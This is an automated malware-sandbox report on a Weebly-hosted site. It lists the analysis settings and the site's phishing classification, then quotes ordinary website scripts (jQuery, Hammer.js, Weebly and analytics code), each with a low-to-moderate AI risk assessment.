Start date and time:	2024-12-16 14:55:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://simatantincendi.weebly.com/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@23/52@54/255

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 142.250.181.142, 64.233.162.84, 172.217.17.46, 217.20.58.100
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://simatantincendi.weebly.com/

LLM Input / Output

Input	Output
URL: https://simatantincendi.weebly.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://simatantincendi.weebly.com
URL: https://cdn2.editmysite.com/js/jquery-1.8.3.min.js... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided code appears to be the minified version of the jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is primarily focused on DOM manipulation, event handling, and other common web development tasks, which are typical of a legitimate library like jQuery. Overall, this script poses a low risk and is likely safe to use in a web application." }
/! jQuery v1.8.3 jquery.com \| jquery.org/license / (function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t,r)}return v.grep(e,function(e,r){return v.inArray(e,t)>=0===n})}function lt(e){var t=ct.split("\|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}function Lt(e,t){return e.getElementsByTagName(t)[0]\|\|e.appendChild(e.ownerDocument.createElement(t))}function At(e,t){if(t.nodeType!==1\|\|!v.hasData(e))return;var n,r,i,s=v._data(e),o=v._data(t,s),u=s.events;if(u){delete o.handle,o.events={};for(n in u)for(r=0,i=u[n].length;r<i;r++)v.event.add(t,n,u[n][r])}o.data&&(o.data=v.extend({},o.data))}function Ot(e,t){var n;if(t.nodeType!==1)return;t.clearAttributes&&t.clearAttributes(),t.mergeAttributes&&t.mergeAttributes(e),n=t.nodeName.toLowerCase(),n==="object"?(t.parentNode&&(t.outerHTML=e.outerHTML),v.support.html5Clone&&e.innerHTML&&!v.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):n==="input"&&Et.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):n==="option"?t.selected=e.defaultSelected:n==="input"\|\|n==="textarea"?t.defaultValue=e.defaultValue:n==="script"&&t.text!==e.text&&(t.text=e.text),t.removeAttribute(v.expando)}function Mt(e){return typeof e.getElementsByTagName!="undefined"?e.getElementsByTagName(""):typeof e.querySelectorAll!="undefined"?e.querySelectorAll(""):[]}function _t(e){Et.test(e.type)&&(e.defaultChecked=e.checked)}function Qt(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=Jt.length;while(i--){t=Jt[i]+n;if(t in e)return t}return r}function Gt(e,t){return e=t\|\|e,v.css(e,"display")==="none"\|\|!v.contains(e.ownerDocument,e)}function Yt(e,t){var n,r,i=[],s=0,o=e.length;for(;s<o;s++){n=e[s];if(!n.style)continue;i[s]=v._data(n,"olddisplay"),t?(!i[s]&&n.style.display==="none"&&(n.style.display=""),n.style.display===""&&Gt(n)&&(i[s]=v._data(n,"olddisplay",nn(n.nodeName)))):(r=Dt(n,"display"),!i[s]&&r!=="none"&&v._data(n,"olddisplay",r))}for(s=0;s<o;s++){n=e[s];if(!n.style)continue;if(!t\|\|n.style.display==="none"\|\|n.style.display==="")n.style.display=t?i[s]\|\|"":"none"}return e}function Zt(e,t,n){var r=Rt.exec(t);return r?Math.max(0,r[1]-(n\|\|0))+(r[2]\|\|"px"):t}function en(e,t,n,r){var i=n===(r?"border":"content")?4:t==="width"?1:0,s=0;for(;i<4;i+=2)n==="margin"&&(s+=v.css(e,n+$t[i],!0)),r?(n==="content"&&(s-=parseFloat(Dt(e,"padding"+$t[i]))\|\|0),n!=="margin"&&(s-=parseFloat(Dt(e,"border"+$t[i]+"Width"))\|\|0)):(s+=parseFloat(Dt(e,"padding"+$t[i]))\|\|0,n!=="padding"&&(s+=parseFloat(Dt(e,"border"+$t[i]+"Width"))\|\|0));return s}function tn(e,t,n){var r=t==="width"?e.offsetWidth:e.offsetHeight,i=!0,s=v.support.boxSizing&&v.css(e,"boxSizing")==="border-box";if(r<=0\|\|r==null){r=Dt(e,t);if(r<0\|\|r==null)r=e.style[t];if(Ut.test(r))return r;i=s&&(v.support.boxSizingReliable\|\|r===e.style[t]),r=parseFloat(r)\|\|0}return r+en(e,t,n\|\|(s?"border":"content"),i)+"px"}function nn(e){if(Wt[e])return Wt[e];var t=v("<"+e+">").appendTo(i.body),n=t.css("display");t.remove();if(n==="none"\|\|n===""){Pt=i.body.appendChild(Pt\|\|v.extend(i.createElement("iframe"),{frameBord
URL: https://cdn2.editmysite.com/js/site/footerSignup.j... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a legitimate script that sets up a footer signup container for a Weebly website. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script primarily focuses on DOM manipulation, styling, and event handling related to the footer signup container. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be implementing common web development practices, albeit with some outdated techniques. With the contextual adjustments, the final risk score is 3, indicating a low-risk script." }
(function(t){var e={};function r(n){if(e[n])return e[n].exports;var i=e[n]={exports:{},id:n,loaded:false};t[n].call(i.exports,i,i.exports,r);i.loaded=true;return i.exports}r.m=t;r.c=e;r.p="https://cdn2.editmysite.com/js/";r.p="https://"+window.ASSETS_BASE+"/js/"\|\|r.p;return r(0)})({0:function(t,e,r){t.exports=r(610)},610:function(t,e){(function(t,e){var r={height:62,mobileHeight:124,getHeight:function(){if(u()){return r.mobileHeight}return r.height}};function n(e,n){var u=t("#weebly-footer-signup-container-v3");if(!u.length){return}i(e,n);r.element=u;r.iframe=t("#weebly-footer-signup-iframe");if(!o()){r.element.remove();return}a();s();l();t(window).on({resize:p(l,500),scroll:p(l,500)})}function i(e,r){var n='<link href="//'+e+"/css/free-footer-v3.css?buildtime="+r+'" rel="stylesheet">';t(n).appendTo("head")}function o(){var e=t("body");var r=!!document.getElementById("kb-container");var n=e.hasClass("splash-page");return!(r\|\|n)}function a(){var e=t("body");e.css({minHeight:"100%",position:"relative"});document.body.style.setProperty("height","auto","important");e.append(r.element)}function s(){var e=t("#weebly-footer-signup-container-v3");var r=500;t(".signup-container-header").hover(p(function(){if(u()){return}var t="288px";e.animate({height:t},r)},r2,true),p(function(){if(u()){return}var t="62px";e.animate({height:t},r)},r,false))}function p(t,e,r){var n;return function(){var i=this;var o=arguments;var a=function(){n=null;if(!r)t.apply(i,o)};var s=r&&!n;clearTimeout(n);n=setTimeout(a,e);if(s)t.apply(i,o)}}function l(){var e=r.element[0];f(e);y();var n=t("#wsite-mini-cart");if(n.length){if(window.innerHeight-n[0].getBoundingClientRect().bottom<=0){e.style.setProperty("display","none","important")}}var i=window.location.pathname.indexOf("/store/checkout/")!==-1;if(i&&c()){e.style.setProperty("display","none","important")}window.container=r}function u(){var t=window.matchMedia("(max-width: 480px)");return t?t.matches:true}function c(){var t=window.matchMedia("(max-width: 800px)");return t?t.matches:true}function f(e){var n=r.element.find("");n.push(e);n.each(function(){var e=t(this);var r=e[0];var n="block";if(e.hasClass("weebly-icon")){n="inline-block"}r.style.setProperty("visibility","visible","important");r.style.setProperty("display",n,"important")});e.style.setProperty("height",r.getHeight()+"px","important");e.style.setProperty("position","absolute","important");e.style.setProperty("bottom","0","important");e.style.setProperty("left","0","important");e.style.setProperty("right","0","important");e.style.setProperty("position","fixed","important");e.style.setProperty("width","290px","important");e.style.setProperty("left","10px","important");e.style.setProperty("z-index","20","important");if(u()){e.style.setProperty("width","100%","important");e.style.setProperty("height","45px","important");e.style.setProperty("left","0px","important");e.style.setProperty("z-index","5","important");t("img.footer-ab-published-toast-image").css("display","none","important");t("span.footer-ab-published-toast-text").css("display","none","important")}var i=t("body");var o=i.css("paddingBottom");var a=r.element.outerHeight(true)+"px";if(o!==a){document.body.style.setProperty("padding-bottom",a,"important")}}function y(){var e=t(".header");var r=t("#weebly-footer-signup-container-v3");var n=0;var i=setInterval(function(){n++;if(e.hasClass("stuck")){e.css("padding","10px 40px 60px");clearInterval(i)}else{if(u()){r.css("left","0px")}else{r.css("left","10px")}}if(n===5){clearInterval(i)}},200)}e.footer={setupContainer:n}})(window.jQuery,window.Weebly)}});
URL: https://cdn2.editmysite.com/js/lang/en/stl.js?buil... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a part of a legitimate website functionality, likely related to internationalization and louserzation. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The code is primarily focused on providing language-specific URLs and translation functionality, which is a common practice for websites that serve users in multiple languages. While the code uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the snippet seems to be a part of a benign website implementation with no clear signs of malicious intent." }
window._W = window.Weebly = window.Weebly \|\| {}; _W.getSiteLanguageURL = function(lang){ return '//assets-staging.weebly.net/js/lang/%lang%/stl.js?buildTime=1234&'.replace('%lang%', lang); } _W.tli=function(s){return s;} _W.siteLang = 'en'; _W.ftl=_W.stl=(function() { var f = function(s) { var t = tls[s] \|\| s; var a = Array.prototype.slice.call(arguments, 1); for (var i = 0; i < a.length; i++) { t = t.split('{{'+i+'}}').join(a[i]); } return t ? t.replace(/^\\s(.+?)\\s$/, '$1') : s; }, tls = JSON.parse('{\"authorize_net.errors.E_WC_04\":\"Please provide mandatory field.\",\"authorize_net.errors.E_WC_05\":\"Please provide valid credit card number.\",\"authorize_net.errors.E_WC_06\":\"Please provide valid expiration month.\",\"authorize_net.errors.E_WC_07\":\"Please provide valid expiration year.\",\"authorize_net.errors.E_WC_08\":\"Expiration date must be in the future.\",\"authorize_net.errors.E_WC_15\":\"Please provide valid CVV.\",\"authorize_net.errors.E_WC_16\":\"Please provide valid ZIP code.\",\"authorize_net.errors.E_WC_17\":\"Please provide valid card holder name.\",\"components.message_component.dismiss_text\":\"Dismiss\",\"components.pagination_component.next\":\"Next\",\"components.pagination_component.previous\":\"Previous\",\"components.star_input_component.1_star\":\"Terrible\",\"components.star_input_component.2_star\":\"Bad\",\"components.star_input_component.3_star\":\"Mediocre\",\"components.star_input_component.4_star\":\"Good\",\"components.star_input_component.5_star\":\"Excellent\",\"components.star_input_component.no_rating_label\":\"No rating\",\"components.star_input_component.rating_label\":\"{{0}} stars\",\"customer_accounts.account_details.contact_information_title\":\"Contact Information\",\"customer_accounts.account_details.default_text\":\"You don\'t have any saved information.\",\"customer_accounts.account_details.header_text\":\"Saved Information\",\"customer_accounts.account_details.no_shipping_addresses_text\":\"You don\'t have any addresses.\",\"customer_accounts.account_details.shipping_address_title\":\"Shipping Address\",\"customer_accounts.account_home.header_text\":\"My Account\",\"customer_accounts.checkout.account_has_been_created\":\"Your account has been created.\",\"customer_accounts.checkout.check_mark\":\"check mark\",\"customer_accounts.checkout.create_account_instructions\":\"Create an account to save your shipping information and view your order history.\",\"customer_accounts.checkout.log_in_to_your_account\":\"log in to your account\",\"customer_accounts.common.back\":\"Back\",\"customer_accounts.common.close\":\"Close\",\"customer_accounts.common.confirm_password\":\"Confirm Password\",\"customer_accounts.common.create_account\":\"Create Account\",\"customer_accounts.common.done\":\"Done\",\"customer_accounts.common.email_address\":\"Email Address\",\"customer_accounts.common.errors.bad_email\":\"Please enter a valid email address.\",\"customer_accounts.common.errors.email_required\":\"Please enter an email address.\",\"customer_accounts.common.errors.generic_error\":\"Something went wrong.\",\"customer_accounts.common.errors.password_required\":\"Please enter a password.\",\"customer_accounts.common.forgot_password\":\"Forgot password\",\"customer_accounts.common.log_in\":\"Log In\",\"customer_accounts.common.log_out\":\"Log Out\",\"customer_accounts.common.my_account\":\"My Account\",\"customer_accounts.common.next\":\"Next\",\"customer_accounts.common.or\":\"or\",\"customer_accounts.common.password\":\"Password\",\"customer_accounts.log_in.bad_email_or_password\":\"Your email address or password is incorrect.\",\"customer_accounts.log_in.header_text\":\"Log in to your account\",\"customer_accounts.log_in.instruction\":\"Welcome back! You already have an account. Log in to it below.\",\"customer_accounts.look_up.header_text\":\"Log in or create an account\",\"customer_accounts.look_up.instruction\":\"Start by entering your email address below.\",\"custome
URL: https://simatantincendi.weebly.com/files/theme/cus... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript code appears to be a legitimate implementation of common web development practices, such as fixed navigation, mobile sidebar functionality, and DOM manipulation. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is consistent with typical website functionality and does not exhibit any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The code seems to be focused on enhancing the user experience and managing the website's layout and navigation, which is a low-risk context." }
jQuery(function($) { // Fixed nav $.fn.checkHeaderPositioning = function(scrollEl, scrollClass) { var $me = $(this); if (!$me.length) { return; } if($(scrollEl).scrollTop() > 50) { $me.addClass(scrollClass); } else if($(scrollEl).scrollTop() === 0) { $me.removeClass(scrollClass); } }; // Mobile sidebars $.fn.expandableSidebar = function(expandedClass) { var $me = this; $me.on('click', function() { if(!$me.hasClass(expandedClass)) { $me.addClass(expandedClass); } else { $me.removeClass(expandedClass); } }); } // Interval loop $.fn.intervalLoop = function(condition, action, duration, limit) { var counter = 0; var looper = setInterval(function(){ if (counter >= limit \|\| $.fn.checkIfElementExists(condition)) { clearInterval(looper); } else { action(); counter++; } }, duration); } // Check if element exists $.fn.checkIfElementExists = function(selector) { return $(selector).length; } var birdseyeController = { init: function(opts) { var base = this; $('body').checkHeaderPositioning(window, 'affix'); // Add classes to elements base._addClasses(); if(!$('body').hasClass('wsite-editor') && $('#wsite-nav-cart-a').length) { $('#wsite-nav-cart-a').html($('#wsite-nav-cart-a').html().replace(/[()]/g, '')); } setTimeout(function(){ base._checkCartItems(); base._attachEvents(); if($('#wsite-nav-cart-a').length) { $('#wsite-nav-cart-a').html($('#wsite-nav-cart-a').html().replace(/[()]/g, '')); } $('.banner-wrap .container').css("padding-top", $('.birdseye-header').outerHeight() + "px"); }, 1500); }, _addClasses: function() { var base = this; // Add fade in class to nav + logo + banner $('body').addClass('fade-in'); // Add class to nav items with subnav $('.wsite-menu-default').find('li.wsite-menu-item-wrap').each(function(){ var $me = $(this); if($me.children('.wsite-menu-wrap').length > 0) { $me.addClass('has-submenu'); $('<span class="icon-caret"></span>').insertAfter($me.children('a.wsite-menu-item')); } }); // Add class to subnav items with subnav $('.wsite-menu').find('li.wsite-menu-subitem-wrap').each(function(){ var $me = $(this); if($me.children('.wsite-menu-wrap').length > 0) { $me.addClass('has-submenu'); $('<span class="icon-caret"></span>').insertAfter($me.children('a.wsite-menu-subitem')); } }); // Keep subnav open if submenu item is active if ($(window).width() < 1024) { $('li.wsite-menu-subitem-wrap.wsite-nav-current').parents('.wsite-menu-wrap').addClass('open'); } // Add placeholder text to inputs setTimeout(function(){ $('.wsite-form-sublabel').each(function(){ var sublabel = $(this).text(); $(this).prev('.wsite-form-input').attr('placeholder', sublabel); }); }, 1000); }, _checkCartItems: function() { var base = this; if($('#wsite-mini-cart').find('li.wsite-product-item').length > 0) { $('body').addClass('cart-full'); } else { $('body').removeClass('cart-full'); } }, _moveLogin: function() { var login = $('#member-login').clone(true); $('.mobile-nav .wsite-menu-default > li:last-child').after(login); }, _moveFlyout: function() { var maxheight = $(window).height() - $('.birdseye-header').outerHeight(); var anchor = true; $('#wsite-menus .wsite-menu-wrap').each(function() { if ($(this).outerHeight() > maxheight) { anchor = false; } }); if (anchor) { var move = $("#wsite-menus").detach(); $(".bird
URL: https://simatantincendi.weebly.com/... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This script appears to be a standard Google Analytics tracking implementation, which is a common and legitimate practice. It sets up the Google Analytics tracking object, configures the tracking domain, and asynchronously loads the Google Analytics script. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The use of the Google Analytics platform is a well-established and trusted practice for website analytics, so this script is considered low risk." }
var _gaq = _gaq \|\| []; _gaq.push(['_setAccount', 'UA-7870337-1']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; // NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s); })(); _W.Analytics = _W.Analytics \|\| {'trackers': {}}; _W.Analytics.trackers.wGA = '_gaq';
URL: https://simatantincendi.weebly.com/... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a legitimate script that performs some common DOM manipulation tasks, such as modifying CSS classes and adjusting the height of an iframe. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The script is using well-known libraries like jQuery and Prototype, which are common in web development. Overall, this script seems to be a benign utility script with no clear malicious intent." }
(function(jQuery) { try { if (jQuery) { jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like'); var $commentFrame = jQuery('#commentArea iframe'); if ($commentFrame.length > 0) { var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50; $commentFrame.css('min-height', frameHeight + 'px'); } if (jQuery('.product-button').length > 0){ jQuery(document).ready(function(){ jQuery('.product-button').parent().each(function(index, product){ if(jQuery(product).attr('target') == 'paypal'){ if (!jQuery(product).find('> [name="bn"]').length){ jQuery('<input>').attr({ type: 'hidden', name: 'bn', value: 'DragAndDropBuil_SP_EC' }).appendTo(product); } } }); }); } } else { // Prototype $$('div.blog-social div.fb-like').each(function(div) { div.className = 'blog-social-item blog-fb-like'; }); $$('#commentArea iframe').each(function(iframe) { iframe.style.minHeight = '410px'; }); } } catch(ex) {} })(window._W && _W.jQuery);
URL: https://cdn2.editmysite.com/js/site/main.js?buildT... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "This script appears to be a module loader or bundler, which is a common practice in modern web development. However, it exhibits some behaviors that raise moderate concerns: 1. It uses the `publishedWBJP` global variable, which could potentially be used for data exfiltration or other malicious purposes. 2. It dynamically loads additional scripts from external domains, which could lead to the execution of remote code. 3. The script is heavily obfuscated, making it difficult to analyze and understand its true purpose. While the script may be part of a legitimate web application, the combination of these factors warrants further investigation to ensure there are no hidden malicious intentions. A risk score of 6 is assigned due to the moderate-risk indicators present." }
(function(e){var t=window["publishedWBJP"];window["publishedWBJP"]=function o(s,a){var l,u,c=0,d=[];for(;c<s.length;c++){u=s[c];if(n[u])d.push.apply(d,n[u]);n[u]=0}for(l in a){if(Object.prototype.hasOwnProperty.call(a,l)){e[l]=a[l]}}if(t)t(s,a);while(d.length)d.shift().call(null,r);if(a[0]){i[0]=0;return r(0)}};var i={};var n={2:0};function r(t){if(i[t])return i[t].exports;var n=i[t]={exports:{},id:t,loaded:false};e[t].call(n.exports,n,n.exports,r);n.loaded=true;return n.exports}r.e=function e(t,i){if(n[t]===0)return i.call(null,r);if(n[t]!==undefined){n[t].push(i)}else{n[t]=[i];var o=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.type="text/javascript";s.charset="utf-8";s.async=true;s.src=r.p+""+{11:"5ab2b9565867ea666fb8",12:"616c4dd0568c07183a5d",13:"392868449bcd750dc40a",14:"959616cc5e24d1c02d25",15:"b6353cc0e423d7a50e8c",16:"054f225d281471b09455",17:"2e90ceda1aa59119b0b5",18:"afaef63f10fcebc93d78"}[t]+".js";o.appendChild(s)}};r.m=e;r.c=i;r.p="https://cdn2.editmysite.com/js/";r.p="https://"+window.ASSETS_BASE+"/js/"\|\|r.p;return r(0)})({0:function(e,t,i){e.exports=i(620)},1:function(e,t,i){var n;!(n=function(){if(window.Weebly!==undefined&&window.Weebly.jQuery!==undefined){return window.Weebly.jQuery}return window.jQuery}.call(t,i,t,e),n!==undefined&&(e.exports=n))},2:function(e,t,i){var n,r;!(n=[i(1)],r=function(e){window.Weebly=window._W=window._W\|\|{};window._W.utl=window._W.utl\|\|function(e){window._W.failedTls=window._W.failedTls\|\|[];window._W.failedTls.push(e);return e};window._W.ftl=window._W.ftl\|\|function(e){window._W.failedFtls=window._W.failedFtls\|\|[];window._W.failedFtls.push(e);return""};window._W.utl=window._W.utl\|\|function(e){window._W.failedUtls=window._W.failedUtls\|\|[];window._W.failedUtls.push(e);return""};window._W.stl=window._W.stl\|\|function(e){window._W.failedStls=window._W.failedStls\|\|[];window._W.failedStls.push(e);return""};window._W.setCookie=function(e,t,i){var n=new Date;n.setTime(n.getTime()+i2460601e3);var r="expires="+n.toUTCString();document.cookie=e+"="+t+"; "+r};window._W.clearCookie=function(e){window._W.setCookie(e,"",-1)};window._W.getCookie=function(e){var t=e+"=";var i=document.cookie.split(";");for(var n=0;n<i.length;n++){var r=i[n];while(r.charAt(0)==" ")r=r.substring(1);if(r.indexOf(t)==0)return r.substring(t.length,r.length)}return""};window._W.jQuery=e;window._W.RECAPTCHA_PUBLIC_KEY=window["RECAPTCHA_PUBLIC_KEY"]="6Lf4O9USAAAAAOSa9cF4SEtxBcjrwrLe1_yP00ke";window._W.INVISIBLE_RECAPTCHA_PUBLIC_KEY=window["INVISIBLE_RECAPTCHA_PUBLIC_KEY"]="6LfRSRsUAAAAAKZnbFLRh9pFqexMBpUkku4TAYM7";return window._W}.apply(t,n),r!==undefined&&(e.exports=r))},3:function(e,t,i){(function(t){e.exports=t["_"]=i(34)}).call(t,function(){return this}())},5:function(e,t,i){var n,r;(function(o,s){if(true){!(n=[i(3),i(1),t],r=function(e,t,i){o.Backbone=s(o,i,e,t)}.apply(t,n),r!==undefined&&(e.exports=r))}else if(typeof t!=="undefined"){var a=require("underscore");s(o,t,a)}else{o.Backbone=s(o,{},o._,o.jQuery\|\|o.Zepto\|\|o.ender\|\|o.$)}})(this,function(e,t,i,n){var r=e.Backbone;var o=[];var s=o.push;var a=o.slice;var l=o.splice;t.VERSION="1.1.2";t.$=n;t.noConflict=function(){e.Backbone=r;return this};t.emulateHTTP=false;t.emulateJSON=false;var u=t.Events={on:function(e,t,i){if(!d(this,"on",e,[t,i])\|\|!t)return this;this._events\|\|(this._events={});var n=this._events[e]\|\|(this._events[e]=[]);n.push({callback:t,context:i,ctx:i\|\|this});return this},once:function(e,t,n){if(!d(this,"once",e,[t,n])\|\|!t)return this;var r=this;var o=i.once(function(){r.off(e,o);t.apply(this,arguments)});o._callback=t;return this.on(e,o,n)},off:function(e,t,n){var r,o,s,a,l,u,c,f;if(!this._events\|\|!d(this,"off",e,[t,n]))return this;if(!e&&!t&&!n){this._events=void 0;return this}a=e?[e]:i.keys(this._events);for(l=0,u=a.length;l<u;l++){e=a[l];if(s=this._events[e]){this._events[e]=r=[];if(t\|\|n){for(c=0,f=s.length;c<f;c++){o=s[c];if(t&&t!==o.callback&&t!==o.callback._callback\|\|n&&n!==o.context){r.push(o)}}}if(!r.length
URL: https://simatantincendi.weebly.com/files/theme/plu... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript code appears to be the Hammer.js library, which is a popular open-source JavaScript library for adding multi-touch and gesture support to web applications. The code does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is well-structured and follows common JavaScript patterns, indicating it is likely a legitimate library. While the code uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script can be considered low risk." }
/! Hammer.JS - v2.0.4 - 2014-09-28 http://hammerjs.github.io/ * * Copyright (c) 2014 Jorik Tangelder; * Licensed under the MIT license / (function(window, document, exportName, undefined) { 'use strict'; var VENDOR_PREFIXES = ['', 'webkit', 'moz', 'MS', 'ms', 'o']; var TEST_ELEMENT = document.createElement('div'); var TYPE_FUNCTION = 'function'; var round = Math.round; var abs = Math.abs; var now = Date.now; /* * set a timeout with a given scope * @param {Function} fn * @param {Number} timeout * @param {Object} context * @returns {number} / function setTimeoutContext(fn, timeout, context) { return setTimeout(bindFn(fn, context), timeout); } /* * if the argument is an array, we want to execute the fn on each entry * if it aint an array we don't want to do a thing. * this is used by all the methods that accept a single and array argument. * @param {\|Array} arg @param {String} fn * @param {Object} [context] * @returns {Boolean} / function invokeArrayArg(arg, fn, context) { if (Array.isArray(arg)) { each(arg, context[fn], context); return true; } return false; } /* * walk objects and arrays * @param {Object} obj * @param {Function} iterator * @param {Object} context / function each(obj, iterator, context) { var i; if (!obj) { return; } if (obj.forEach) { obj.forEach(iterator, context); } else if (obj.length !== undefined) { i = 0; while (i < obj.length) { iterator.call(context, obj[i], i, obj); i++; } } else { for (i in obj) { obj.hasOwnProperty(i) && iterator.call(context, obj[i], i, obj); } } } /* * extend object. * means that properties in dest will be overwritten by the ones in src. * @param {Object} dest * @param {Object} src * @param {Boolean} [merge] * @returns {Object} dest / function extend(dest, src, merge) { var keys = Object.keys(src); var i = 0; while (i < keys.length) { if (!merge \|\| (merge && dest[keys[i]] === undefined)) { dest[keys[i]] = src[keys[i]]; } i++; } return dest; } /* * merge the values from src in the dest. * means that properties that exist in dest will not be overwritten by src * @param {Object} dest * @param {Object} src * @returns {Object} dest / function merge(dest, src) { return extend(dest, src, true); } /* * simple class inheritance * @param {Function} child * @param {Function} base * @param {Object} [properties] / function inherit(child, base, properties) { var baseP = base.prototype, childP; childP = child.prototype = Object.create(baseP); childP.constructor = child; childP._super = baseP; if (properties) { extend(childP, properties); } } /* * simple function bind * @param {Function} fn * @param {Object} context * @returns {Function} / function bindFn(fn, context) { return function boundFn() { return fn.apply(context, arguments); }; } /* * let a boolean value also be a function that must return a boolean * this first item in args will be used as the context * @param {Boolean\|Function} val * @param {Array} [args] * @returns {Boolean} / function boolOrFn(val, args) { if (typeof val == TYPE_FUNCTION) { return val.apply(args ? args[0] \|\| undefined : undefined, args); } return val; } /* * use the val2 when val1 is undefined * @param {} val1 @param {} val2 @returns {} / function ifUndefined(val1, val2) { return (val1 === undefined) ? val2 : val1; } /** * addEventListener with multiple events at once * @param {EventTarget} target * @param {String} types * @param {Function} handler / function addEventListeners(target, types, handler) { each(splitStr(types), function(type) { target.addEventListener(type, handler, false); }); } /* * removeEventListener with multiple events at once * @para
URL: https://simatantincendi.weebly.com/... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a legitimate script that aims to ensure the visibility of certain content (`.cc_links`) on a web page. It uses standard DOM manipulation techniques and does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The script is wrapped in a try-catch block, which is a common practice to handle potential errors. While the repeated execution of the `forceShowCcLinksForever` function every 10 seconds could be considered aggressive DOM manipulation, it is likely done to ensure the content remains visible, which is a common practice for certain types of content. Overall, the script appears to be a benign implementation with no clear malicious intent." }
(function(jQuery) { try { function forceShowCcLinks() { var ccLinks = document.querySelector('.cc_links'); if (!ccLinks) { return; } var ccLinksVisible = jQuery(ccLinks).is(':visible'); if (ccLinksVisible) { return; } ccLinks.style.display = 'block'; var ccParent = ccLinks.parentElement; var ccParentVisible = jQuery(ccParent).is(':visible'); if (ccParentVisible) { return; } ccParent.style.display = 'block'; var ccGrandparent = ccParent.parentElement; var ccGrandparentVisible = jQuery(ccGrandparent).is(':visible'); if (ccGrandparentVisible) { return; } ccGrandparent.style.display = 'block'; } function forceShowCcLinksForever() { var tenSeconds = 10000; forceShowCcLinks(); setTimeout(forceShowCcLinksForever, tenSeconds); } jQuery(document).ready(forceShowCcLinksForever); } catch(ex) {} })(window._W && _W.jQuery);
